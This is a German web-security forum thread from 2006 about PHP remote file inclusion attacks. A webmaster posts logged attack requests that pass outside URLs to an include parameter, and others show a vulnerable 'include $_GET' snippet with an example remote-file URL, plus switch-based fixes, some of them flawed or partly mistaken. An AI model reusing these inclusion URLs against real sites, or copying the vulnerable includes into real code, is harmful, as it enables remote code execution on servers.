[HaBo]

BattleMaker · 27.01.06, 19:38

Hi @all!

Ich will alle Webmaster unter euch darauf aufmerksam machen, dass Include-Attacken erstaunlich oft ausprobiert werden.
Damit meine ich, dass bestimmte Leute ganz gezielt nach PHP-Seiten suchen, die andere Seiten inkludieren, so wie z.B. meine eigene es macht: Main.php?inc=X

In diesem Fall wird X inkludiert. Sofern man sein Skript nicht besonders geschützt hat, ist es dem Hacker nun möglich, Skripte von seinem eigenen Server zu inkludieren. Dazu gibt er als X z.B. http://irgendwas.xx/hack.txt ein. Alle PHP-Blöcke in dieser Datei werden als PHP-Code auf dem eigenen Server ausgeführt.

Wozu ich das euch jetzt alles erzähle? Weil das verdammt oft passiert.
Vor 2 Tagen habe ich in meiner Website eingebaut, dass jeglicher fehlerhafter Zugriff geloggt wird und ich somit die Möglichkeit habe, Angriffe zurückzuverfolgen oder gar rechtliche Schritte gegen gewisse Leute einleiten kann.

Das ist mein aktueller Log, der seit dem 25.01 um ca. 20:00 Uhr geführt wird:

Code:

25.01.2006, 21:01:48 | IP: 62.214.98.X | Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://katytaylor net/images/hi txt?" anzeigen (Main.php?inc=http://katytaylor net/images/hi txt?)
25.01.2006, 21:10:05 | IP: 62.214.98.X | Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://katytaylor net/images/hi txt?" anzeigen (Main.php?inc=http://katytaylor net/images/hi txt?)
25.01.2006, 21:22:43 | IP: 62.214.98.X | Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://katytaylor net/images/hi txt?" anzeigen (Main.php?inc=http://katytaylor net/images/hi txt?)
25.01.2006, 21:22:43 | IP: 62.214.98.X | Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://katytaylor net/images/hi txt?" anzeigen (Main.php?inc=http://katytaylor net/images/hi txt?)
26.01.2006, 15:50:35 | IP: 85.99.234.XX | Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://members lycos co uk/bilinmeyenler222/k txt?" anzeigen (Main.php?inc=http://members lycos co uk/bilinmeyenler222/k txt?)

Die letzte Stelle der IP-Addresse habe ich selbst entfernt.
(Punkte wurden aus der URL autom. entfernt.)

Wie man an dieser Datei sieht (http://members.lycos.co.uk/bilinmeyenler222/k.txt) verwenden diese Noobs noch nicht mal ihre eigenen PHP-Skripte!

Ich hoffe so mancher von euch wird nun seine Website nochmal gründlich untersuchen.
Wenn Ihr wollt könnte ihr ja auf meiner Homepage mal nach Lücken suchen *g*...

MfG, BattleMaker

Oi!Alex · 28.01.06, 13:01

Es wird oft versucht... aber denke mal auch meine Seite/Seiten sind in der hinsicht gut geschützt...

denke mal

PHP-Code:

  switch($_GET[section])
{
a : include(a.php); break;
b : include(b.php); break;
default: default.php break;
}

(hoffe sind jetzt keine syntax fehler drin)
okay an der stelle "switch($_GET[section])" kann man noch die variable mit addslashs bearbeiten... aber sonst, sollte es doch sicher sein... oder irre ich mich da?

p.s. nicht wundern hast jetzt von mir ein paar log einträge, wollte wat testen

Anzeige

- Anzeige -

TeeKayo2 · 29.01.06, 12:08

Hi!

Ich verstehe nich ganz wie der Angriff funktioniert.

Meinst du das wenn oben in der URLeiste ein inc getätigt wird der Angreifer einfach die url abändert und er kann sein Script auf deinem Server laufen lassen OO?!

Das wär ja n Bug der übelsten Sorte.

Klär mich doch bitte auf wenn du magst.

MfG,

TKo?

CraHack · 29.01.06, 12:58

Ganz genau!

Stell dir vor du hast folgendes Script:

PHP-Code:

  <?PHP

include $_GET["include"];


?>

Jetzt könntest du diese seite z.b. so aufrufen.

http://www.MeinServer.de/index.php?include=news.php

Dann wird das Script "news.php" geladen und ausgeführt.

Du könntest diese Seite jedoch auch so aufrufen.

http://www.MeinServer.de/index.php?i...ER.de/böse.txt

Dann wird die Datei böse.txt vom anderen Server geladen und bei dir ausgeführt.

TeeKayo2 · 29.01.06, 16:38

Oh...
Wie kommts das ich davon noch nie was gehört habe?
Bin gespannt was man dagegen tun kann,gerade wenn man selbst auf includes angewiesen ist

Kommt in meine Sammlung,
ThX&MfG;

TK

fapeg · 29.01.06, 17:11

du bist auf jeden fall sicher wenn du feste dateien anstatt variable includest.

beispiel:

PHP-Code:

  <?php
include("bla.php")
?>

ist sicherer als:

PHP-Code:

  <?php
include($a)
?>

wenn $a jedoch vorher ein fester wert übergeben wird sollte es nicht klappen

CPU8080 · 29.01.06, 17:14

Ich mach sowas eigentlich nie über $_GET[],
sondern wenn ich sowas mache lasse ich ein hiddenfeld mit wert in einer form abschicken und die action setz ich dann auf die Seite die es bekommen soll.
Kann man den Post auch anzapfen also einen form auf meine Seite abschicken??

Ranger · 29.01.06, 17:18

Natürlich kann man das
Man kann sein Formular auf jede Seite setzen, also auch auf deine

Sjune · 26.11.06, 13:14

Moin, ist zwar schon bissel alt hier aber egal.

Hat einer von euch ne Ahnung ob es irgendwie möglich ist noch fremde Dateien zu includen wenn ich vorher mit file_exists prüfe ob die GET Datei existiert?
Weil so wie ich das sehe gibt file_exists nur true zurück wenn die datei auch auf dem eigenen Server liegt. Oder sehe ich da was falsch?

Prometheus · 26.11.06, 16:39

Ich glaube kaum das Jemand mal irgendetwas "Gemeines" Includen kann.
Nimmt doch einfach mal eine Fallunterscheidung wie Switch. Falls jetzt Jemand folgendes einfügen will: index.php?inc=seite3.php oder index.php?inc=böse.txt, wird er keinen Erfolg haben, denn anstatt z.B. böse.txt zu includen, wird index2.php Includet.
Irgendwie muss ja mit den Wert, den man bekommt gearbeitet werden.

Code:

$inc = $_GET['inc'];
  switch($inc)
  {
     case 'seite1':
                 include 'seite1.php';
                 break;
      case 'seite2':
                 include 'seite2.php';
                 break;
      default:
                 include 'index2.php';
                 break;

stone.dr · 26.11.06, 16:56

So genannte File Inclusions, sind bei älteren PHP Server wirklich möglich.

Konnte einmal live sehen, wie ein "Freund" ne Shell in ein CMS includet hat.
Der Bug lag darin, dass der Server die Fremde Datei (txt - <?php ) geparst hat.

Aktuelle FileInclusions, auch wenn sie auf Seiten wie milworm etc. gehandelt werden, funktionieren bei den neuen PHP Versionen nicht mehr (zumindest kenn ich kein aktuelles Bsp.).

Sjune · 26.11.06, 17:55

Also hm wenn ich das schon mit dem switch case machen sollte würde ich es wenn dann so relaisieren(Erspart ne menge Code

):

Code:

$inc = $_GET['inc'];
  switch($inc)
  {
     case 'seite1':
     case 'seite2':
       include($_GET['inc']);
     break;
     default:
       // not found
     break;

Aber ich wollte nur wissen ob man das file_exists auch wirklich nicht umgehen kann.

@stone.dr
Ich weis nicht was du mit File Inclusions meinst aber das was ich daruntzer verstehe: Fremdes Scipte auf dem Server einbinden das geht sehr wohl noch mit den neusten PHP versionen!

Oi!Alex · 26.11.06, 18:00

Zitat:

Original von Sjune

Code:

$inc = $_GET['inc'];
  switch($inc)
  {
     case 'seite1':
     case 'seite2':
       include($_GET['inc']);
     break;
     default:
       // not found
     break;

PHP-Code:

   switch(addslashs($_GET['inc']))
 {
     case 'seite1': include(seite1.php); break;
     case 'seite2': include(seite2.php); break;

     default: include(default.php); break;
}

so sollte es wohl am besten sein gruß

bcom · 26.11.06, 18:05

joa, man kann aber irgendwo in der php.ini abschalten dass man dateien von anderen servern in php öffnen/includen kann wenn ich mich nich ganz irre

Prometheus · 27.11.06, 15:05

Zitat:

Original von Sjune
Ich weis nicht was du mit File Inclusions meinst aber das was ich daruntzer verstehe: Fremdes Scipte auf dem Server einbinden das geht sehr wohl noch mit den neusten PHP versionen!

Du meinst sicher die Sicherheitslücke, die vor einiger Zeit bei den Webservern mit PHP aufgetaucht ist!? Dort konntest du dann die Konfigurationswerte über eine ähnliche Methode ändern und/oder Zugriff auf den Server direkt erhalten.

Anderseits gibt es da noch die SQL-Injections, die manchmal funktionieren.

Aber es kommt immer auf die Programmierung an. Z.B.: bei einer Fallunterscheidung wie ich sie aufgeführt hatte, wäre es nicht möglich ein böses Script einzufügen.
Anderseits könnte ich mir nicht vorstellen wie du nun deine bösen Scripts includen könntest. Ein direkten PHP-Code anstatt der Variabel wird doch nicht so einfach ausgeführt.

Zitat:

Original von Sjune
Also hm wenn ich das schon mit dem switch case machen sollte würde ich es wenn dann so relaisieren(Erspart ne menge Code

):

Code:

$inc = $_GET['inc'];
  switch($inc)
  {
     case 'seite1':
     case 'seite2':
       include($_GET['inc']);
     break;
     default:
       // not found
     break;

Würde dir aber kaum was bringen. Du hast Code an der falschen Stelle gespart.
Die "//..." sind übrigens Kommentare und werden in PHP nicht ausgeführt. Somit hast du kein default.

Anzeige

- Anzeige -

27.01.06, 19:38	#1 (permalink)
BattleMaker Registriert seit: 13.03.05 Likes: 0	'Include-Attacken' Anzeige Hi @all! Ich will alle Webmaster unter euch darauf aufmerksam machen, dass Include-Attacken erstaunlich oft ausprobiert werden. Damit meine ich, dass bestimmte Leute ganz gezielt nach PHP-Seiten suchen, die andere Seiten inkludieren, so wie z.B. meine eigene es macht: Main.php?inc=X In diesem Fall wird X inkludiert. Sofern man sein Skript nicht besonders geschützt hat, ist es dem Hacker nun möglich, Skripte von seinem eigenen Server zu inkludieren. Dazu gibt er als X z.B. http://irgendwas.xx/hack.txt ein. Alle PHP-Blöcke in dieser Datei werden als PHP-Code auf dem eigenen Server ausgeführt. Wozu ich das euch jetzt alles erzähle? Weil das verdammt oft passiert. Vor 2 Tagen habe ich in meiner Website eingebaut, dass jeglicher fehlerhafter Zugriff geloggt wird und ich somit die Möglichkeit habe, Angriffe zurückzuverfolgen oder gar rechtliche Schritte gegen gewisse Leute einleiten kann. Das ist mein aktueller Log, der seit dem 25.01 um ca. 20:00 Uhr geführt wird: Code: 25.01.2006, 21:01:48 \| IP: 62.214.98.X \| Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://katytaylor net/images/hi txt?" anzeigen (Main.php?inc=http://katytaylor net/images/hi txt?) 25.01.2006, 21:10:05 \| IP: 62.214.98.X \| Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://katytaylor net/images/hi txt?" anzeigen (Main.php?inc=http://katytaylor net/images/hi txt?) 25.01.2006, 21:22:43 \| IP: 62.214.98.X \| Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://katytaylor net/images/hi txt?" anzeigen (Main.php?inc=http://katytaylor net/images/hi txt?) 25.01.2006, 21:22:43 \| IP: 62.214.98.X \| Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://katytaylor net/images/hi txt?" anzeigen (Main.php?inc=http://katytaylor net/images/hi txt?) 26.01.2006, 15:50:35 \| IP: 85.99.234.XX \| Fehler: [404] Jemand wollte die nicht vorhandene Seite "http://members lycos co uk/bilinmeyenler222/k txt?" anzeigen (Main.php?inc=http://members lycos co uk/bilinmeyenler222/k txt?) Die letzte Stelle der IP-Addresse habe ich selbst entfernt. (Punkte wurden aus der URL autom. entfernt.) Wie man an dieser Datei sieht (http://members.lycos.co.uk/bilinmeyenler222/k.txt) verwenden diese Noobs noch nicht mal ihre eigenen PHP-Skripte! Ich hoffe so mancher von euch wird nun seine Website nochmal gründlich untersuchen. Wenn Ihr wollt könnte ihr ja auf meiner Homepage mal nach Lücken suchen g... MfG, BattleMaker

28.01.06, 13:01	#2 (permalink)
Oi!Alex Registriert seit: 17.01.06 Likes: 7	Es wird oft versucht... aber denke mal auch meine Seite/Seiten sind in der hinsicht gut geschützt... denke mal PHP-Code: `switch($_GET[section]) { a : include(a.php); break; b : include(b.php); break; default: default.php break; }` (hoffe sind jetzt keine syntax fehler drin) okay an der stelle "switch($_GET[section])" kann man noch die variable mit addslashs bearbeiten... aber sonst, sollte es doch sicher sein... oder irre ich mich da? p.s. nicht wundern hast jetzt von mir ein paar log einträge, wollte wat testen

29.01.06, 12:58	#4 (permalink)
CraHack Registriert seit: 20.11.05 Likes: 0	Ganz genau! Stell dir vor du hast folgendes Script: PHP-Code: `<?PHP include $_GET["include"]; ?>` Jetzt könntest du diese seite z.b. so aufrufen. http://www.MeinServer.de/index.php?include=news.php Dann wird das Script "news.php" geladen und ausgeführt. Du könntest diese Seite jedoch auch so aufrufen. http://www.MeinServer.de/index.php?i...ER.de/böse.txt Dann wird die Datei böse.txt vom anderen Server geladen und bei dir ausgeführt.

29.01.06, 17:11	#6 (permalink)
fapeg Registriert seit: 14.02.05 Likes: 0	du bist auf jeden fall sicher wenn du feste dateien anstatt variable includest. beispiel: PHP-Code: `<?php include("bla.php") ?>` ist sicherer als: PHP-Code: `<?php include($a) ?>` wenn $a jedoch vorher ein fester wert übergeben wird sollte es nicht klappen

26.11.06, 16:39	#10 (permalink)
Prometheus Senior Member Registriert seit: 01.01.04 Likes: 0	Ich glaube kaum das Jemand mal irgendetwas "Gemeines" Includen kann. Nimmt doch einfach mal eine Fallunterscheidung wie Switch. Falls jetzt Jemand folgendes einfügen will: index.php?inc=seite3.php oder index.php?inc=böse.txt, wird er keinen Erfolg haben, denn anstatt z.B. böse.txt zu includen, wird index2.php Includet. Irgendwie muss ja mit den Wert, den man bekommt gearbeitet werden. Code: $inc = $_GET['inc']; switch($inc) { case 'seite1': include 'seite1.php'; break; case 'seite2': include 'seite2.php'; break; default: include 'index2.php'; break;

29.01.06, 12:08	#3 (permalink)
TeeKayo2 Registriert seit: 12.10.05 Likes: 0	Hi! Ich verstehe nich ganz wie der Angriff funktioniert. Meinst du das wenn oben in der URLeiste ein inc getätigt wird der Angreifer einfach die url abändert und er kann sein Script auf deinem Server laufen lassen OO?! Das wär ja n Bug der übelsten Sorte. Klär mich doch bitte auf wenn du magst. MfG, TKo?

29.01.06, 16:38	#5 (permalink)
TeeKayo2 Registriert seit: 12.10.05 Likes: 0	Oh... Wie kommts das ich davon noch nie was gehört habe? Bin gespannt was man dagegen tun kann,gerade wenn man selbst auf includes angewiesen ist Kommt in meine Sammlung, ThX&MfG; TK

29.01.06, 17:14	#7 (permalink)
CPU8080 Registriert seit: 20.07.05 Likes: 0	Ich mach sowas eigentlich nie über $_GET[], sondern wenn ich sowas mache lasse ich ein hiddenfeld mit wert in einer form abschicken und die action setz ich dann auf die Seite die es bekommen soll. Kann man den Post auch anzapfen also einen form auf meine Seite abschicken??

29.01.06, 17:18	#8 (permalink)
Ranger Registriert seit: 22.05.05 Likes: 0	Natürlich kann man das Man kann sein Formular auf jede Seite setzen, also auch auf deine

26.11.06, 13:14	#9 (permalink)
Sjune Registriert seit: 02.11.05 Likes: 0	Moin, ist zwar schon bissel alt hier aber egal. Hat einer von euch ne Ahnung ob es irgendwie möglich ist noch fremde Dateien zu includen wenn ich vorher mit file_exists prüfe ob die GET Datei existiert? Weil so wie ich das sehe gibt file_exists nur true zurück wenn die datei auch auf dem eigenen Server liegt. Oder sehe ich da was falsch?

26.11.06, 16:56	#11 (permalink)
stone.dr Registriert seit: 25.12.04 Likes: 0	So genannte File Inclusions, sind bei älteren PHP Server wirklich möglich. Konnte einmal live sehen, wie ein "Freund" ne Shell in ein CMS includet hat. Der Bug lag darin, dass der Server die Fremde Datei (txt - <?php ) geparst hat. Aktuelle FileInclusions, auch wenn sie auf Seiten wie milworm etc. gehandelt werden, funktionieren bei den neuen PHP Versionen nicht mehr (zumindest kenn ich kein aktuelles Bsp.).

26.11.06, 17:55	#12 (permalink)
Sjune Registriert seit: 02.11.05 Likes: 0	Also hm wenn ich das schon mit dem switch case machen sollte würde ich es wenn dann so relaisieren(Erspart ne menge Code ): Code: $inc = $_GET['inc']; switch($inc) { case 'seite1': case 'seite2': include($_GET['inc']); break; default: // not found break; Aber ich wollte nur wissen ob man das file_exists auch wirklich nicht umgehen kann. @stone.dr Ich weis nicht was du mit File Inclusions meinst aber das was ich daruntzer verstehe: Fremdes Scipte auf dem Server einbinden das geht sehr wohl noch mit den neusten PHP versionen!

26.11.06, 18:05	#14 (permalink)
bcom Registriert seit: 18.10.06 Likes: 0	joa, man kann aber irgendwo in der php.ini abschalten dass man dateien von anderen servern in php öffnen/includen kann wenn ich mich nich ganz irre

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Brauche Hilfe bei DDOs Attacken	Night	Webmaster-Security	32	04.08.09 12:43
propfind im apache log, Anzeichen auf Attacken?	Bammes	(In)security allgemein	2	27.09.07 18:32
PC für legale Attacken	muh_baris	(In)security allgemein	21	25.09.06 16:19
CLI.exe, DDoS attacken und andere Probs!	ImMoRtaL	Die Problemzone	2	05.02.05 16:08
Genaueres zu Brute Force Attacken	MrMulti	Virenschutz · Tools & Aggressive Software	15	01.07.03 20:16

[HaBo]

'Include-Attacken'